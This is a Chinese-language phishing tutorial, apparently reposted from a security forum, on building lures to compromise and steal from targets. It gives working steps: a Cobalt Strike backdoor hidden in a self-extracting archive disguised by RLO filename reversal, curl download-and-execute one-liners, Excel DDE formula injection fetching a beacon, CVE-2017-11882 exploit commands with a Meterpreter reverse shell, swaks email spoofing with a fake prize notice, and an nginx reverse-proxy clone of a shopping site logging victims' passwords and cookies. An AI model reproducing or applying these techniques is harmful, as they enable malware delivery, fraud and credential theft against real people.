二、网络钓鱼的基本流程
钓鱼一般分为三个步骤:寻找大鱼,制作鱼饵和抛竿
三、如何制作高质量鱼饵
0x01.自解压+RLO
制作思路:利用自解压文件的特性,解压后令其自动执行解压出来的文件,达到上线的目的,由于自解压文件后缀为exe,很容易被识破,所以我们还需使用RLO后缀反转进行一些伪装。
步骤一:用cs生成windows后门
步骤二:随便准备一张图片,使用WinRAR把后门和图片一块自解压
常规——解压路径:C:\windows\temp
设置——解压后运行:C:\windows\temp\artifact.exe
C:\windows\temp\壁纸.jpg
模式——全部隐藏
更新——更新模式——解压并更新文件
更新——覆盖模式——覆盖所有文件
结合邮件钓鱼等方式把“图片”放送给他人,引诱他人上钩,对方双击“图片”后,会同时执行artifact.exe和壁纸.jpg,而且上线cs
步骤一:cs生成后门,放到服务器网站目录下
C:\Windows\System32\cmd.exe /k curl http://xxx.xxx.xxx.xxx/exe/artifact.exe --output C:\Windows\temp\win.exe && C:\Windows\temp\win.exe
步骤一:使用cs生成恶意vba代码
利用excel注入弹出计算器
=cmd| '/c calc'! '!A1'
利用excel注入上线cs
=cmd| '/c curl http://xxx.xxx.xxx.xxx/beacon.exe --output C:\Windows\temp\win.exe && C:\Windows\temp\win.exe' ! 'A1'
利用cve-2017-11882弹出计算器:
生成带有病毒的word文件
python2 Command109b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
利用cve-2017-11882上线msf
use exploit/windows/misc/hta_server
set payload windows/meterpreter/reverse_http
set lport 4444
show options
exploit
python2 Command109b_CVE-2017-11882.py -c "mshta http://192.168.126.132:8080/Uf7DGFz.hta" -o 通知文件.doc -i input.rtf
四、邮件伪造
swaks的用法:
--from <发件人的邮箱>
--ehlo <伪造邮件头>
--body <邮件正文内容>
--header <邮件头信息,subject为邮件标题>
--data <源邮件>
--attach <附件文件>
swaks --to seyoulala@chacuo.net --from A公司 --ehlo 中奖通知 --body 秉承“正德厚生,臻于至善”的企业核心价值观,立足发展,真情回馈社会和客户。全体员工祝贺您在此活动中获得一等奖。再次感谢您对本公司的关信和支持,本信仅为中奖凭证,具体细节见注意事项。--header "Subject: 中奖通知"
Gophish
伪造中奖通知邮件,发送附件
五、网站克隆
1) Social-Engineering Attacks【社工攻击(常用)】
2) Penetration Testing (Fast-Track)【渗透测试(快速的)】
3) Third Party Modules【第三方模块】
4) Update the Social-Engineer Toolkit【更新社工工具包】
5) Update SET configuration【升级配置】
6) Help, Credits, and About【帮助】
1) Spear-Phishing Attack Vectors【鱼叉式网络钓鱼攻击】
2) Website Attack Vectors【web网站式攻击-钓鱼(常用)】
3) Infectious Media Generator【传染性木马】
4) Create a Payload and Listener【创建payload和监听器】
5) Mass Mailer Attack【邮件群发攻击】
6) Arduino-Based Attack Vector【基于安卓的攻击】
7) Wireless Access Point Attack Vector【wifi攻击】
8) QRCode Generator Attack Vector【生成二维码(就普通二维码)】
9) Powershell Attack Vectors【Powershell攻击】
10) Third Party Modules【第三方模块】
1) Java Applet Attack Method【java小程序攻击】
2) Metasploit Browser Exploit Method【Metasploit浏览器利用】
3) Credential Harvester Attack Method【凭证攻击(常用)】
4) Tabnabbing Attack Method【Tabnabbing攻击】
5) Web Jacking Attack Method【web劫持】
6) Multi-Attack Web Method【web多重攻击】
7) HTA Attack Method【HTA攻击】
1) Web Templates【web模板】
2) Site Cloner【克隆网站】
3) Custom Import【自定义导入】
1、启动setoolkit,并选择1,社工攻击
5、输入克隆的站点,监听ip和端口默认就行,最后还需选择一个攻击载荷 Meterpreter Reverse TCP
利用nginx反向代理克隆生成镜像网站就是通过反向代理将请求分发到一个不属于我们的网站去处理,最后将处理的结果再通过nginx返回给用户。
1、打开nginx配置⽂件,在http处添加以下配置,指定日志的存储内容。
log_format Clonelog escape=json '{$remote_addr|'
'$request_filename|'
'$request_body|'
'$http_cookie|'
'$http_x_forwarded_for|'
'$time_local}';
2、在/www/server/panel/vhost/nginx/目录下新增clone.conf,做如下配置,生成镜像网站
server
{
listen 8000;
server_name 127.0.0.1;
index index.html index.htm index.php;
access_log /www/wwwlogs/access.log Clonelog;
location / {
proxy_pass http://xxx.xxx.com;
proxy_buffering off;
proxy_set_header X-Real-Ip $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header Host "xxx.xxx.com";
proxy_set_header Accept-Encoding "";
proxy_set_header User-Agent $http_user_agent;
proxy_set_header referer "http://xxx.xxx.com$request_uri";
}
}
server_name 监听的域名。
重点是$request_body (获取post数据),$http_cookie (获取cookie数据)这就是我们钓⻥的核⼼了。当有⼈访问并登陆我们反向代理的⽹站以后我们点开⽇志就可以看到他的cookie和post提交的⽤户名和密码了。
3、重新加载nginx配置文件,nginx -s reload
4、访问克隆网站,查看效果
以某宝官网为目标
现在两个界面除了url以外,其他的地方基本上都一样了,使用F12寻找原网站的账号密码在form标签中的name值
账号的name值:logonId
密码的name值:password_rsainput
但是只修改这部分会出现问题,就是只能接收到账号,接收不到密码
经排查,需要将密码的name值做修改,不能使用网页原来的值,这里将其修改为passwordaa,确保不会重复
不过这样用户名密码的查看并不方便,写个show.php来进行展示
排版:潇湘信安
文章来源:先知社区(obse****)
原文地址:https://xz.aliyun.com/t/12682
点击下方小卡片或扫描下方二维码观看更多技术文章
师傅们点赞、转发、在看就是最大的支持
文章引用微信公众号"猪猪谈安全",如有侵权,请联系管理员删除!